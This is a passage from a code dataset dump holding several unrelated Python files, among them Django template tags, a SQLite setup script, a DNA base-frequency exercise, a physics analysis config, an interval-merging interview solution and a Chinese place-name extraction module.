node in self.graph:\n if state.colors[node] == 0:\n color0 += 1\n if state.colors[node] == 1:\n color1 += 1\n if state.colors[node] == 2:\n color2 += 1\n if state.colors[node] == 3:\n color3 += 1\n result = max(color1, color2, color3) + color0\n return result;\n\n","sub_path":"Artificial Intelligence/lab2/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191282677","text":"# coding=utf-8\nimport urlparse, os\n\nfrom django import template\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef static(filename, flags=''):\n flags = set(f.strip() for f in flags.split(','))\n url = urlparse.urljoin(settings.STATIC_URL, filename)\n if 'absolute' in flags:\n url = _absolute_url(url)\n if (filename.endswith('.css') or filename.endswith('.js')) and 'no-timestamp' not in flags or 'timestamp' in flags:\n fullname = os.path.join(settings.STATIC_ROOT, *filename.split('/'))\n if os.path.exists(fullname):\n url += '?%d' % os.path.getmtime(fullname)\n return url\n\ndef _absolute_url(url):\n if url.startswith('http://') or url.startswith('https://'):\n return url\n domain = Site.objects.get_current().domain\n return 'http://%s%s' % (domain, url)\n\n\n@register.simple_tag\ndef admin_url(instance, action='change'):\n url = 'admin:{}_{}_{}'.format(instance._meta.app_label, instance._meta.module_name, action)\n return reverse(url, args=(instance.id,))\n","sub_path":"sites/raisonne/taghelpers/templatetags/statictags.py","file_name":"statictags.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"570827692","text":"\"\"\"\nDigital Bucket\nsqlite configuration\nBy D. Bailey\n\"\"\"\nimport sqlite3\nfrom sqlite3 import Error\n\n# database location on local\ndatabase = \"/Users/DavidBailey/db/pythonsqlite.db\"\n\n# create connection to sqlite database\ndef create_connection(db_file):\n\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return None\n\nif __name__ == '__main__':\n create_connection(database)\n\n# create table in sqlite database\ndef create_table(conn, create_table_sql):\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(e)\n\ndef main():\n\n # create table and columns\n sql_create_events_table = \"\"\" CREATE TABLE IF NOT EXISTS events_pt (\n id integer PRIMARY KEY,\n event text NOT NULL,\n type text,\n complete text,\n lat double,\n long double\n ); \"\"\"\n\n # create a database connection\n conn = create_connection(database)\n create_table(conn, sql_create_events_table)\n\nif __name__ == '__main__':\n main()","sub_path":"sqlite_config.py","file_name":"sqlite_config.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"315864116","text":"#This is a demo script for practice.\n#Author: Bin-Guang Ma; Date: 2015-12-20; modified on 2018-11-23\n\nDNAstr = 'ATGAAACGCATTAGCACCACCATTACCACCACCATCACCATTACCACAGGTAACGGTGCGGGCTGA'\n\nA_num = C_num = G_num = T_num = 0\n\nfor i in range(len(DNAstr)):\n if DNAstr[i]=='A':\n A_num = A_num + 1\n elif DNAstr[i]=='C':\n C_num = C_num + 1\n elif DNAstr[i]=='G':\n G_num += 1 #another way\n elif DNAstr[i]=='T':\n T_num += 1 #another way\n\nprint('A_num =', A_num)\nprint('C_num =', C_num)\nprint('G_num =', G_num)\nprint('T_num =', T_num)\n\ntotal_num = len(DNAstr)\n#total_num = float(total_num)\nprint('A_frq =', A_num/total_num)\nprint('C_frq =', C_num/total_num)\nprint('G_frq =', G_num/total_num)\nprint('T_frq =', T_num/total_num)\n\ndna_dic = {'A': 0, 'C': 0, 'G': 0, 'T': 0} #the dict for DNA numbers\nfor n in DNAstr:\n dna_dic[n] += 1\nprint(dna_dic) #print out the DNA numbers in a dict format\n\ndna_frq_dic = {}\nDNAs = 'ACGT' #the 4 kinds of nucleiotides\nfor d in DNAs: #calculate the frequencies\n dna_frq_dic[d] = dna_dic[d]/total_num\nprint(dna_frq_dic) #print out the DNA frequencies in a dict format\n\n#output the DNA numbers and frequencies to a file\noflname = 'D:/frq.txt'\nofl = open(oflname, 'wt') #open file in a writing and text model\nostr = '\\t'.join(DNAs)\nofl.write(ostr + '\\n')\nostr = ''\nfor d in DNAs:\n ostr += str(dna_dic[d]) + '\\t'\nostr = ostr.strip()\nostr += '\\n'\nofl.write(ostr)\nolst = [] #create a list for DNA frequencies\nfor d in DNAs:\n olst.append(str(dna_frq_dic[d]))\nostr = '\\t'.join(olst) + '\\n'\nofl.write(ostr)\nofl.close() #please check the file C:\\frq.txt to see what you got\n\nprint('done! (^_^)')\n\n\n\n\n","sub_path":"Python/python-class/slides/第一周/DNA-frq.py","file_name":"DNA-frq.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"489923318","text":"import FWCore.ParameterSet.Config as cms\nimport os\n\n#--------------------------------------------------------------------------------\n# CV: imports needed by analyzeConfig.py base-class\nfrom tthAnalysis.HiggsToTauTau.configs.recommendedMEtFilters_cfi import *\nfrom tthAnalysis.HiggsToTauTau.configs.EvtYieldHistManager_cfi import *\nfrom tthAnalysis.HiggsToTauTau.configs.hhWeight_cfi import hhWeight\n#--------------------------------------------------------------------------------\n\nprocess = cms.PSet()\n\nprocess.fwliteInput = cms.PSet(\n fileNames = cms.vstring(),\n maxEvents = cms.int32(-1),\n outputEvery = cms.uint32(100)\n)\n\nprocess.fwliteOutput = cms.PSet(\n fileName = cms.string('')\n)\n\nprocess.analyze_hh_bbwwMEM_dilepton = cms.PSet(\n treeName = cms.string('Events'),\n\n skipSelEvents = cms.int32(0),\n maxSelEvents = cms.int32(1000),\n\n process = cms.string(''),\n histogramDir = cms.string(''),\n era = cms.string('2017'),\n\n apply_pileupJetID = cms.string('disabled'),\n\n apply_genWeight = cms.bool(True),\n hasLHE = cms.bool(True),\n\n useAssocJetBtag = cms.bool(False),\n\n lep_mva_cut_mu = cms.double(0.5),\n lep_mva_cut_e = cms.double(0.3),\n lep_mva_wp = cms.string('hh_multilepton'),\n\n jetCleaningByIndex = cms.bool(True),\n\n branchName_electrons = cms.string('Electron'),\n branchName_muons = cms.string('Muon'),\n branchName_jets_ak4 = cms.string('Jet'),\n branchName_jets_ak8 = cms.string('FatJet'),\n branchName_subjets_ak8 = cms.string('SubJet'),\n branchName_met = cms.string('MET'),\n branchName_vertex = cms.string('PV'),\n\n branchName_genLeptons = cms.string('GenLep'),\n branchName_genNeutrinos = cms.string('GenNu'),\n branchName_genJets = cms.string('GenJet'),\n\n # branches specific to HH signal\n branchName_genParticlesFromHiggs = cms.string('GenHiggsDaughters'),\n\n # branches specific to ttbar background\n branchName_genLeptonsFromTop = cms.string('GenLepFromTop'),\n branchName_genNeutrinosFromTop = cms.string('GenNuFromTop'),\n branchName_genBQuarksFromTop = cms.string('GenBQuarkFromTop'),\n\n selEventsFileName_input = cms.string(''),\n selEventsFileName_output = cms.string(''),\n \n # general configuration parameters, required by our analysis framework\n leptonFakeRateWeight = cms.PSet(),\n hhWeight_cfg = hhWeight,\n gen_mHH = cms.vdouble(),\n nonRes_BMs = cms.vstring(),\n\n isDEBUG = cms.bool(False)\n)\n","sub_path":"test/templates/produceMEMNtuple_hh_bb2l_cfg.py","file_name":"produceMEMNtuple_hh_bb2l_cfg.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"589707660","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nfrom transmogrifier.super_gopher import SuperGopher\r\nfrom db_tools import ezfuncs\r\n\r\nthis_path = os.path.abspath(os.path.dirname(__file__))\r\nrkey = pd.read_excel('{}/config/residual_key.xlsx'.format(this_path))\r\n\r\n\r\ndef compute_global_ratios(year_id, drawcols):\r\n eng = ezfuncs.get_engine(conn_def=\"cod\")\r\n ccv = pd.read_sql(\"\"\"\r\n SELECT output_version_id FROM cod.output_version\r\n WHERE code_version=4 AND is_best=1\"\"\", eng).squeeze()\r\n sg = SuperGopher({\r\n 'file_pattern': '{measure_id}_{location_id}.h5',\r\n 'h5_tablename': 'draws'},\r\n 'filepath/codcorrect/{ccv}/draws'.format(ccv=ccv))\r\n ylls = sg.content(location_id=1, year_id=year_id, sex_id=[1, 2],\r\n measure_id=4)\r\n\r\n ratios = []\r\n for resid_cid, yldmap in rkey.groupby('input_cause_id'):\r\n # get the ylls\r\n these_ylls = ylls[ylls.cause_id == resid_cid]\r\n ratio_ylls = ylls[ylls.cause_id.isin(yldmap.ratio_cause_id.unique())]\r\n\r\n # aggregate the inputs to the appropriate level\r\n group_cols = ['age_group_id', 'year_id']\r\n these_ylls = these_ylls.groupby(group_cols)\r\n these_ylls = these_ylls[drawcols].sum().mean(axis=1)\r\n ratio_ylls = ratio_ylls.groupby(group_cols)\r\n ratio_ylls = ratio_ylls[drawcols].sum().mean(axis=1)\r\n\r\n # compute the ratio\r\n ratio = these_ylls / ratio_ylls\r\n ratio = ratio.reset_index()\r\n ratio = ratio.replace(np.inf, 0)\r\n ratio = ratio.replace(np.NaN, 0)\r\n\r\n ratio[\"cause_id\"] = resid_cid\r\n ratios.append(ratio)\r\n\r\n df = pd.concat(ratios)\r\n df_male = df.copy()\r\n df_male[\"sex_id\"] = 1\r\n df_female = df.copy()\r\n df_female[\"sex_id\"] = 2\r\n\r\n return df_male.append(df_female)\r\n\r\n\r\ndef calc(location_id, ratio_df, output_type, drawcols, seq_ylds,\r\n cause_ylds):\r\n assert output_type in [\"cause_id\", \"sequela_id\"], (\r\n \"output_type must be cause_id or sequela_id\")\r\n\r\n resids = []\r\n for resid_cid, yldmap in rkey.groupby('input_cause_id'):\r\n\r\n # get the ylds\r\n if yldmap.ratio_level.unique().squeeze() == 'cause':\r\n ylds = cause_ylds[cause_ylds.cause_id.isin(\r\n yldmap.ratio_cause_id.unique())]\r\n else:\r\n ylds = seq_ylds[seq_ylds.sequela_id.isin(\r\n yldmap.ratio_sequela_id.unique())]\r\n\r\n # aggregate the inputs to the appropriate level\r\n group_cols = ['age_group_id', 'year_id', 'sex_id']\r\n ylds = ylds.groupby(group_cols)\r\n ylds = ylds.sum()\r\n\r\n # grab the ratio we want\r\n ratio = ratio_df[ratio_df.cause_id == resid_cid]\r\n ratio = ratio.set_index(group_cols)\r\n ratio = ratio.reindex(ylds.index, fill_value=0)\r\n ratio = ratio[[col for col in ratio if col != \"cause_id\"]]\r\n ratio = pd.DataFrame(\r\n data=pd.np.tile(ratio.values, (1, len(drawcols))),\r\n index=ratio.index,\r\n columns=drawcols)\r\n\r\n # apply the ratio\r\n ylds.ix[:, drawcols] = (ylds[drawcols].values * ratio.values)\r\n ylds = ylds.reset_index()\r\n\r\n # prep for export\r\n ylds[\"location_id\"] = location_id\r\n ylds['measure_id'] = 3\r\n ylds = ylds[\r\n ['measure_id', 'location_id', 'year_id', 'age_group_id',\r\n 'sex_id'] + drawcols]\r\n if output_type == 'cause_id':\r\n ylds['cause_id'] = yldmap.output_cause_id.unique().squeeze()\r\n resids.append(ylds)\r\n else:\r\n ylds['sequela_id'] = yldmap.output_sequela_id.unique().squeeze()\r\n resids.append(ylds)\r\n\r\n return pd.concat(resids)\r\n","sub_path":"shared_code/central_comp/non_fatal/como/como/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"240891876","text":"'''\nProblem Statement \nGiven a list of non-overlapping intervals sorted by their start time, insert a given interval at the correct position and merge all necessary intervals to produce a list that has only mutually exclusive intervals.\n\nExample 1:\n\nInput: Intervals=[[1,3], [5,7], [8,12]], New Interval=[4,6]\nOutput: [[1,3], [4,7], [8,12]]\nExplanation: After insertion, since [4,6] overlaps with [5,7], we merged them into one [4,7].\n\nExample 2:\n\nInput: Intervals=[[1,3], [5,7], [8,12]], New Interval=[4,10]\nOutput: [[1,3], [4,12]]\nExplanation: After insertion, since [4,10] overlaps with [5,7] & [8,12], we merged them into [4,12].\n\nExample 3:\n\nInput: Intervals=[[2,3],[5,7]], New Interval=[1,4]\nOutput: [[1,4], [5,7]]\nExplanation: After insertion, since [1,4] overlaps with [2,3], we merged them into one [1,4].\n'''\n\n\n#mycode\ndef insert(intervals, new_interval):\n merged = []\n # TODO: Write your code here\n index=0\n for i in range(len(intervals)):\n \n if intervals[i][1] < new_interval[0]:\n merged.append(intervals[i])\n \n if intervals[i][0] <= new_interval[1] and intervals[i][1] >= new_interval[0]:\n new_interval[0]=min(new_interval[0],intervals[i][0])\n new_interval[1]=max(new_interval[1],intervals[i][1])\n index = i\n\n if intervals[i][0] > new_interval[1]:\n if i==index+1:\n merged.append(new_interval)\n new_interval=[-1,-1]\n merged.append(intervals[i])\n if new_interval != [-1,-1]:\n merged.append(new_interval)\n return merged\n\n\ndef main():\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 6])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 10])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[2, 3], [5, 7]], [1, 4])))\n\n\nmain()\n\n\n\n#answer\ndef insert(intervals, new_interval):\n merged = []\n i, start, end = 0, 0, 1\n\n # skip (and add to output) all intervals that come before the 'new_interval'\n while i < len(intervals) and intervals[i][end] < new_interval[start]:\n merged.append(intervals[i])\n i += 1\n\n # merge all intervals that overlap with 'new_interval'\n while i < len(intervals) and intervals[i][start] <= new_interval[end]:\n new_interval[start] = min(intervals[i][start], new_interval[start])\n new_interval[end] = max(intervals[i][end], new_interval[end])\n i += 1\n\n # insert the new_interval\n merged.append(new_interval)\n\n # add all the remaining intervals to the output\n while i < len(intervals):\n merged.append(intervals[i])\n i += 1\n return merged\n\n\ndef main():\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 6])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 10])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[2, 3], [5, 7]], [1, 4])))\n\n\nmain()\n\n\n'''\nTime complexity \nAs we are iterating through all the intervals only once, the time complexity of the above algorithm is O(N)O, \nwhere ‘N’ is the total number of intervals.\n\nSpace complexity \nThe space complexity of the above algorithm will be O(N) as we need to return a list containing all the merged intervals.\n'''\n","sub_path":"Grokking-the-Coding-Interview-Patterns-for-Coding-Questions/4. Pattern Merge Intervals/Insert Interval (medium).py","file_name":"Insert Interval (medium).py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"277645400","text":"# -*- coding: utf-8 -*\r\nimport cgi\r\nimport pickle\r\nimport re\r\nimport time\r\n\r\nimport jsonpath as jsonpath\r\nimport pymysql\r\nimport requests\r\nimport json\r\nimport logging\r\nfrom collections import defaultdict\r\nimport textProcess\r\nfrom bs4 import BeautifulSoup\r\nfrom zhon.hanzi import punctuation\r\n\r\nlogging.basicConfig(level=logging.INFO) # ,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogging = logging.getLogger(__name__)\r\n\r\n\r\nclass GeoKG():\r\n url = 'http://10.122.141.12:9006/similar'\r\n threshlod=1\r\n def get_sim(self, something):\r\n\r\n r = requests.post(self.url, json={\"ck\": \"synonym\", \"synonym_word\": something, \"synonym_selectedMode\": \"auto\",\r\n \"homoionym_word\": \"\", \"homoionym_selectedMode\": \"auto\", \"homoionym_num\": \"\"})\r\n json = r.json()\r\n result = json['detail']['res']['synonym']\r\n return result\r\n\r\n def parsePlaces(self,nslist):\r\n placelist = []\r\n placelist_ = []\r\n placelist_fullname=[]\r\n for ns in nslist:\r\n if (self.place_dict.get(ns)):\r\n samename = self.place_dict.get(ns)\r\n for p in samename:\r\n place = self.place_index.get(p['id'])\r\n placelist.append(place)\r\n # if (place['name'] == '常熟市'):\r\n # print(place)\r\n if place['name']==ns:\r\n #如果名称与全名相对应\r\n placelist_fullname.append(place)\r\n\r\n if place['level'] != '-1' :\r\n self.addplace(placelist_, place)\r\n # logging.info(str(placelist))\r\n # logging.info(str(placelist_))\r\n return self.filter_ai_global(placelist, placelist_,placelist_fullname)\r\n\r\n def parseDoc_global(self,doc):\r\n t = time.time()\r\n nslist = self.tp.posseg(doc, ['ns'])\r\n logging.info('%d nslist:%s' % (time.time() - t, str(nslist)))\r\n return self.parsePlaces(nslist)\r\n\r\n def filter_ai_global(self,placelist,placelist_,placelist_fullname):\r\n placelist_sure = defaultdict(set)\r\n for p in placelist_fullname:\r\n placelist_sure[p['level']].add(p['name'])\r\n self.complete_place(placelist_sure, p)\r\n\r\n for p in placelist:\r\n # if(p['name']=='北仑区'):\r\n # print(placelist_sure)\r\n if p['name'] in placelist_sure[p['level']]:continue\r\n p2parent = self.place_index.get(p['pid'])\r\n #一种省直接对区级市,江苏常熟\r\n if p2parent==None:\r\n placelist_sure[p['level']].add(p['name'])\r\n continue\r\n if p2parent in placelist:\r\n placelist_sure[p['level']].add(p['name'])\r\n # placelist_sure[p2parent['level']].add(p2parent['name'])\r\n self.complete_place(placelist_sure,p)\r\n continue\r\n if placelist_.count(p2parent)>self.threshlod and placelist.count(p)threshlod and districtlist.count(d)threshlod and citylist.count(c)threshlod:\r\n provincelist_sure.add(p['name'])\r\n\r\n\r\n # logging.info(str(districtlist_sure))\r\n # logging.info(str(citylist_sure))\r\n # logging.info(str(provincelist_sure))\r\n\r\n return citylist_sure,districtlist_sure,provincelist_sure\r\n\r\n\r\n # 暂时没有国的\r\n def getPlace(self, s, complete=True):\r\n city, district, province,city_,province_ = None, None, None,None,None\r\n if (self.city_dict.get(s)):\r\n # print('find city ', self.city_dict.get(s, set()))\r\n # print(self.city_index.get(self.city_dict.get(s, set())['id']))\r\n samename=self.city_dict.get(s)\r\n for c in samename:\r\n city = self.city_index.get(c['id'])\r\n # 补充上层地区\r\n if complete and city:\r\n province_ = self.province_index.get(city['pid'])\r\n\r\n if (self.district_dict.get(s)):\r\n # print('find district ', self.district_dict.get(s, set()))\r\n # print(self.district_index.get(self.district_dict.get(s, set())['id']))\r\n district = self.district_index.get(self.district_dict.get(s, set())['id'])\r\n if complete and district:\r\n city_ = self.city_index.get(district['pid'])\r\n\r\n province_ = self.province_index.get(city_['pid'])\r\n\r\n\r\n if (self.province_dict.get(s)):\r\n # print('find province ', self.province_dict.get(s, set()))\r\n # print(self.province_index.get(self.province_dict.get(s, set())['id']))\r\n province = self.province_index.get(self.province_dict.get(s, set())['id'])\r\n return city, district, province,city_,province_\r\n\r\n def test(self):\r\n # print(self.get_sim('本拉登'))\r\n s = '习近平在重庆调研时强调,创新、协调、绿色、开放、共享的发展理念,一带一路是在深刻总结国内外发展经验教训、分析国内外发展大势的基础上形成的,凝聚着对经济社会发展规律的深入思考,体现了“十三五”乃至更长时期我国的发展思路、发展方向、发展着力点。'\r\n s = '宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。'\r\n s = '5月的延安山青天蓝,游人如织。刚刚过去的“五一”假期,延安共接待游客255万多人次,同比增长29.6%。近年来,在红色旅游快速发展的带动下,延安依靠独特的历史人文和自然资源魅力,创建全域旅游城市,旅游产业成为延安打赢脱贫攻坚战的强劲推动力。\\\r\n  黄河沿岸的千山万壑造就了延安市延川县雄奇的自然景观,位于县城以南48公里的乾坤湾镇,拥有红军东征革命纪念馆、黄河乾坤湾、伏羲码头等旅游资源。\\\r\n  62岁的冯永泽经历过两次手术,身体一直不太好,曾长期靠低保和种枣树维持生活,4个子女都在外地打工,没法儿照顾老两口。\\\r\n  2015年,认定为贫困户的冯永泽被招聘到乾坤湾镇黄河蛇曲国家地质公园做保洁员,每个月有1260元工资。老伴则用政府补助的5万元,在村里开起了农家乐,老两口每年的收入将近3万元。家里脱了贫,冯永泽越来越开朗。\\\r\n  宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。\\\r\n  2018年,康坪村引进专业的旅游公司,将村民闲置的窑洞打造成民宿,每孔窑洞每个月由企业支付200元,闲置窑洞变成了“乡村致富宝”。去年村里的民宿共接待游客3.2万人次。\\\r\n  为了接待游客,村里把几孔窑洞改为能同时容纳100多人就餐的特色餐厅。去年,34岁的黄燕娃被招聘在餐厅厨房工作,每月工资2600元。\\\r\n  黄燕娃说,村里发展民宿,把自己家的4孔窑洞出租了,随后又在餐厅找到工作。“去年还啥也不会做呢,现在有了做小吃的手艺,今后也不担心生活出路了。”\\\r\n  洛川县是我国苹果主产区之一,还是著名的洛川会议旧址所在地。临近洛川会议纪念馆的阿寺村,在苹果种植业之外,依托红色旅游资源,发展特色农业休闲观光旅游,让群众脱贫致富又多一个途径。\\\r\n  作为陕北苹果的发源地,永乡镇阿寺村如今除了有好吃的苹果,还变得更加好看好玩,村里墙上的农民画、街口的铜像都是以苹果为主题,每条小巷也都以不同的苹果品种命名,颇具特色。\\\r\n  村里的主干道两边有店铺���业,接待各地游客。村民李磊磊的小超市就开在这条街上。26岁的他几年前不幸因车祸致残而失去了劳动能力。结婚不久、家里没什么积蓄的李磊磊,为了治疗费用,东拼西凑借了二十几万元,生活陷入困境。\\\r\n  2017年被列为建档立卡贫困户后,李磊磊用政府发放的产业补助6000元,在村里开了个小超市。他通过在网上进货,小超市有了100多种日用品,也在一年的时间里为家里带来1万多元的纯收入。现在,李磊磊靠自食其力走出了阴影。\\\r\n  “去年一年村里的旅游人次保守估计有10万,我们目前还在争创4A级景区,希望能吸引更多游客。”阿寺村驻村干部田林说。\\\r\n  据延安市旅游局统计,2018年全市接待游客6343.98万人次,旅游综合收入410.7亿元。'\r\n# s='宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。\\\r\n#   2018年,康坪村引进专业的旅游公司,将村民闲置的窑洞打造成民宿,每孔窑洞每个月由企业支付200元,闲置窑洞变成了“乡村致富宝”。去年村里的民宿共接待游客3.2万人次。\\\r\n#   为了接待游客,村里把几孔窑洞改为能同时容纳100多人就餐的特色餐厅。去年,34岁的黄燕娃被招聘在餐厅厨房工作,每月工资2600元。\\\r\n#   黄燕娃说,村里发展民宿,把自己家的4孔窑洞出租了,随后又在餐厅找到工作。“去年还啥也不会做呢,现在有了做小吃的手艺,今后也不担心生活出路了。”\\\r\n#   洛川县是我国苹果主产区之一,还是著名的洛川会议旧址所在地。临近洛川会议纪念馆的阿寺村,在苹果种植业之外,依托红色旅游资源,发展特色农业休闲观光旅游,让群众脱贫致富又多一个途径。\\\r\n#   作为陕北苹果的发源地,永乡镇阿寺村如今除了有好吃的苹果,还变得更加好看好玩,村里墙上的农民画、街口的铜像都是以苹果为主题,每条小巷也都以不同的苹果品种命名,颇具特色。\\\r\n#   村里的主干道两边有店铺营业,接待各地游客。'\r\n# print(self.parseDoc(s))\r\n# s='新华社印务网“凹凸设计奖”报名入口开通诚邀全球设计师 中国财富网讯“凹凸设计奖”将于3月17日-20日在广东佛山举办的第十六届中博会国际家具展、中国(广东)国际定制家具博览会上发布。“凹凸设计奖”致力\\\r\n# 于搭建开源的全球设计师共享平台,通过设计驱动、产业融合、模式创新,实现全球原创设计智力资源的共享机制,让设计、生产、消费资源全球共享。“凹凸”是中国文字,也是世界符号。“凹凸”既蕴含着中国传统文化,又体现出了\\\r\n# 现代设计元素。“凹凸”师法自然,融汇着东方智慧和匠心精神,所以“凹凸”是无极限的。“凹凸设计奖”将采取面向社会公开发布和通过大赛组委会特邀导师进行定向提名推荐的双重方式共同邀请参赛者。   “凹凸设计奖”的参\\\r\n# 选对象为致力于“美好生活”的九大领域的全球设计师。评选工作由中华全国工商业联合会家具装饰业商会作为主要发起人,成立评奖委员会。首届评奖委员会由40位推荐导师、20位初审评委和5位终审评委共同构成。“凹凸设计奖”首\\\r\n# 创“导师制”赛制规则,大赛组委会将邀请40位世界著名设计师担任大赛导师,每位导师可推荐5位设计师。由导师对参赛者进行甄选、创意辅导、参赛指导,以及未来导师工作室的设计定向培养签约合作等。该赛制模式将为“凹凸设计\\\r\n# 奖”进行赛事质量把关及后续市场推广合作产生可持续的商业动能。导师们将在第十六届中博会国际家具展开幕仪式上共同宣言,并将受邀签约入驻“国际贸易设计中心(家居)”,为促进服务贸易创新设计领域的国际合作走出一条创新\\\r\n# 之路。2018年11月,首个面向家居行业设计服务的国际贸易平台落户上海普陀区月星家居茂。图为国际贸易设计中心(家居)揭牌仪式附:1.“凹凸设计奖”的申报条件申报对象为全球设计师。申报作品必须是原创作品,其形式包括概念\\\r\n# 设计、产品和创新服务,作品版权所有人可为最终获得知识产权的个人、组织、团队或公司。还未申请取得“知识产权”,但确保符合原创设计的作品也可申报。申报作品分为家具设计、室内设计、软装陈设、家居饰品、智能科技、灯光\\\r\n# 设计、艺术装置、展览展示、材料应用九大类,寓意“打开美好生活的九种方式”。2.凹凸设计奖”的申报流程申报渠道:(1)组委会特邀导师推荐 (2)大赛官网:www.aotuaward.com申报作品展示日期:2019年3月17日-20日展示地\\\r\n# 点:第十六届中博会国际家具展中国(广东)国际定制家具博览会申报截止日期:2019年6月30日。申报入口:http://aotuaward.yuexing.com(申报为在线申报,按申报表条件和要求填写及上传资料。)评审委员会依据本办法规定的申\\\r\n# 报条件和要求对申报的作品进行初评,并将初审结果告知申报人或申报单位,并进入终评。评审结果在2019年7月公布。'\r\n #两个普陀区的问题,一个在舟山,一个在上海\r\n # print(self.parseDoc_global('常熟市'))\r\n rows=self.query_city_name('SELECT DISTINCT file_uuid,txt FROM e20190304 GROUP BY file_uuid,txt LIMIT 10,20')\r\n for row in rows:\r\n title=row[0]\r\n detail=row[1]\r\n logging.info(str(title)+detail)\r\n t=time.time()\r\n pl=self.parseDoc_global(str(title)+detail)\r\n logging.info('%s ' % str(pl))\r\n logging.info('cost:%d' %(time.time()-t))\r\n logging.info('-'*15)\r\n\r\n\r\n def connect_db(self):\r\n return pymysql.connect(host='192.168.1.101',\r\n port=3306,\r\n user='root',\r\n password='',\r\n database='xinhua',\r\n charset='utf8')\r\n\r\n def query_city_name(self, sql_str):\r\n logging.info(sql_str)\r\n con = self.connect_db()\r\n cur = con.cursor()\r\n cur.execute(sql_str)\r\n rows = cur.fetchall()\r\n cur.close()\r\n con.close()\r\n return rows\r\n\r\n def __init__(self,threshold=1):\r\n\r\n load_file = open('./mod/city_dict.bin', 'rb')\r\n self.city_dict = pickle.load(load_file)\r\n load_file = open('./mod/city_index.bin', 'rb')\r\n self.city_index = pickle.load(load_file)\r\n logging.info('city count %d,city name count:%s' % (len(self.city_index), len(self.city_dict)))\r\n\r\n load_file = open('./mod/district_dict.bin', 'rb')\r\n self.district_dict = pickle.load(load_file)\r\n load_file = open('./mod/district_index.bin', 'rb')\r\n self.district_index = pickle.load(load_file)\r\n logging.info('district count %d,district name count:%s' % (len(self.district_index), len(self.district_dict)))\r\n\r\n load_file = open('./mod/province_dict.bin', 'rb')\r\n self.province_dict = pickle.load(load_file)\r\n load_file = open('./mod/province_index.bin', 'rb')\r\n self.province_index = pickle.load(load_file)\r\n logging.info('province count %d,province name count:%s' % (len(self.province_index), len(self.province_dict)))\r\n\r\n load_file = open('./mod/place_dict.bin', 'rb')\r\n self.place_dict = pickle.load(load_file)\r\n load_file = open('./mod/place_index.bin', 'rb')\r\n self.place_index = pickle.load(load_file)\r\n #还要去掉一些错词\r\n with open('./resources/place_remove.txt','r',encoding='utf-8') as f:\r\n for line in f.readlines():\r\n line=line.strip()\r\n self.place_dict.pop(line)\r\n\r\n logging.info('place count %d,place name count:%s' % (len(self.place_index), len(self.place_dict)))\r\n self.threshlod=threshold\r\n self.tp = textProcess.TextProcess()\r\n\r\n load_file = open('./mod/baidu_place.bin', 'rb')\r\n self.baidu_place=pickle.load(load_file)\r\n logging.info('baidu place count %d' % (len(self.baidu_place)))\r\n\r\n self.zhishi_place=dict()\r\n\r\n\r\n def genCity(self, cities):\r\n #字典模式下,如果出现重复就没法处理了,怎么办呢?\r\n cityName_all_dict = defaultdict(list)\r\n cityIndex = dict()\r\n #亚洲\t1\t-1\t1\tAsia\r\n #阿富汗\t0040000000\t1\t2\tAfghanistan\r\n #巴达赫尚省\t0040100000\t0040000000\t3\tBadakhshan\r\n for num,city in enumerate(cities):\r\n cityName = city[0]\r\n logging.info('%d,%s' % (num,cityName))\r\n cityEName=city[4] if len(city)>4 else None\r\n aliasCityName = self.get_sim(cityName)\r\n # if self.baidu_place.get(cityName):\r\n # baiduCityNames=self.parseHtml(cityName,self.baidu_place.get(cityName))\r\n # else:\r\n baiduCityNames=self.getBaiduSame(cityName)\r\n if len(baiduCityNames)==0:\r\n baiduCityNames=self.getZhishi(cityName)\r\n\r\n cityName_all = set([cityName,cityEName]).union(set(aliasCityName)).union(set(baiduCityNames))\r\n # if(cityEName==None):\r\n # print(cityName_all)\r\n #这里是全的\r\n cityIndex[city[1]] = {'name': city[0], 'pid': city[2],'level':city[3]}\r\n\r\n if (cityName[-1] in ['市', '县', '省']):\r\n\r\n cityName_all.add(cityName[:-1])\r\n # 